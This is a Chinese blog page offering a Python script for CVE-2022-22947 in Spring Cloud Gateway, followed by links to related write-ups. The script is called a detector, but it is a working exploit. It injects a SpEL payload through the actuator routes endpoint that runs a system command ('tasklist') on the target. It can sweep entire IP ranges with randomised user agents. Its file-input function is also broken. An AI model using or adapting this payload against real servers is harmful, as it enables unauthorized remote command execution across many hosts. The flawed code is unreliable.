CVE-2022-22947

最新推荐文章于 2024-06-22 02:08:15 发布
原创 最新推荐文章于 2024-06-22 02:08:15 发布 · 441 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python

该脚本用于检测SpringCloudGateway是否存在高危漏洞。通过发送特定请求到目标系统的`/actuator/gateway/routes`和`/actuator/gateway/refresh`端点,尝试触发潜在的安全问题。如果成功,将打印`success-----------<target>`,表明目标可能存在漏洞。此脚本适用于批量检测多个目标,支持从文件读取目标列表,并可设置代理。

Spring Cloud Gateway高危漏洞-检测脚本

import argparse
import requests,json
from IPy import IP
requests.packages.urllib3.disable_warnings


from fake_useragent import UserAgent
ua = UserAgent()
ua.update()


#定义函数检查是否有漏洞
def Ckeck_vul(target,port):
    date=json.dumps({
        "id": "test",
        "filters": [{
            "name": "AddResponseHeader",
            "args": {
                "name": "Result",
                "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"tasklist\"}).getInputStream()))}"
            }
        }],
        "uri": "https://www.baidu.com"
    })
    # proxy = '192.168.1.110:1080'
    # proxies = {
    #     "http": "http://%(proxy)s/" % {'proxy': proxy},
    #     "https": "http://%(proxy)s/" % {'proxy': proxy}
    # }
    # ip=IP(target)
    # for x in ip:
    s = requests.session()
    s.keep_alive = False
    requests.DEFAULT_RETRIES = 5
    url="http://"+target+":"+port+"/actuator/gateway/routes/test"
    # print(url)
    try:
        result1=s.post(url,date,headers={"Content-Type": "application/json","User-Agent":ua.random})
        if result1.status_code==201:
                url1 = "http://" +target+":"+port+"/actuator/gateway/refresh"
                try:
                    refreshRequest=s.post(url1,headers={'Connection': 'close',"User-Agent":ua.random})
                    # print(refreshRequest.headers)
                    # print(refreshRequest.status_code)
                    if refreshRequest.status_code==200:
                        try:
                            resuitRequest = s.get(url, headers={'Connection': 'close', "User-Agent": ua.random})
                            # print(resuitRequest.text)
                            # print(resuitRequest.status_code)
                            print("success-----------"+target)
                        except requests.exceptions.ConnectionError:
                            print("get result error")
                except requests.exceptions.ConnectionError:
                    print("refresh route error")
    except requests.exceptions.ConnectionError:
            print("connection error")


#从文件中读取目标域名
def ReadUrl(filepath):
    with open(file="filepath",mod="r",encoding='utf-8') as f:
        for url in f.readlines():
            return url

if __name__ == '__main__':
    parser=argparse.ArgumentParser()
    parser.add_argument("-t","--t",help=("目标,默认为IP段"))
    parser.add_argument("-f","--filepath",help=("域名列表文件地址"))
    parser.add_argument("-p","--port",nargs="?",type=str,help=("端口号"),default="8080")
    parser.add_argument("-i","--ip",help=("目标ip"))
    args=parser.parse_args()
    if args.ip:
        Ckeck_vul(args.ip,args.port)
    elif args.t:
        ip=IP(args.t)
        for x in ip:
            tg=x.strFullsize()
            # print(type(tg))
            # print(tg)
            Ckeck_vul(tg,args.port)
    elif args.filepath:
        tg=ReadUrl(args.filepath)
        Ckeck_vul(tg,args.port)
论Spring系列之CVE-2022-22947
weixin_51721627的博客
06-24 1330
Spring系列挺好的,好就好在全是漏洞
gateway漏洞(CVE-2022-22947
最新发布
super_vegetable_bird的博客
11-21 1092
早上被电话吵醒,线上环境出现Bug,很多接口请求都失败了,绕开网关请求各个微服务都是正常的,经过网关就异常了,观察到页面上接口路径都被莫名其妙的改了,去看日志发现网关出现了 Cannot fetch registry from server reactor.core.Exceptions$ErrorCallbackNotImplemented: java.lang.IndexOutOfBoundsException: Index: 0, Size: 0。表明在尝试访问一个空的列表时发生了越界异常。
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947
hjseo_seg的博客
08-02 826
SpringCloudGateway是SpringCloud下的一个项目,该项目是基于Spring5.0、SpringBoot2.0和ProjectReactor等技术开发的网关,它旨在为微服务架构提供一种简单有效、统一的API路由管理方式。使用SpringCloudGateway的应用如果对外暴露了GatewayActuator接口,则可能存在被CVE-2022-22947漏洞利用的风险。,获取系统权限。漏洞利用的前置条件。...
精选资源
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
springboot gateway命令执行漏洞复现(CVE-2022-22947)+内存马
qq_61860998的博客
06-22 3477
springboot gateway命令执行+内存马
[Vulfocus解题系列]spring 命令执行(CVE-2022-22947
00勇士王子的博客
06-03 1599
使用docker部署环境。
CVE-2022-22947 SpringCloud GateWay SpEL RCE.doc
07-09
CVE-2022-22947 SpringCloud GateWay SpEL RCE CVE-2022-22947是一种影响SpringCloud GateWay的远程代码执行漏洞,通过SpEL(Spring Expression Language)实现RCE(Remote Code Execution)。下面是关于该漏洞的...
春秋云镜 CVE-2022-22947
qq_22002773的博客
07-18 700
春秋云镜 CVE-2022-22947
CVE-2022-22947(Spring-Cloud-Gateway)
Christ1na的博客
04-09 1170
`SpringCloud Gateway` 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
白帽子九一
03-15 1675
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947) 遵纪守法 任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益 漏洞描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问ActuatorAPI的情况下,将可以利用该漏洞执行任意命令。 漏洞影响: 3.1.0、 3.0
春秋云镜:CVE-2022-22947
yh
12-05 365
Spring Cloud Gateway 未授权访问
CVE-2022-22947(SpringCloud Gateway)
一支花傲寒的博客
11-09 2173
SpringCloud Gateway远程执行漏洞
CVE-2022-22947(远程代码执行漏洞)
weixin_65722679的博客
06-24 532
CVE-2022-22947 漏洞复现
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值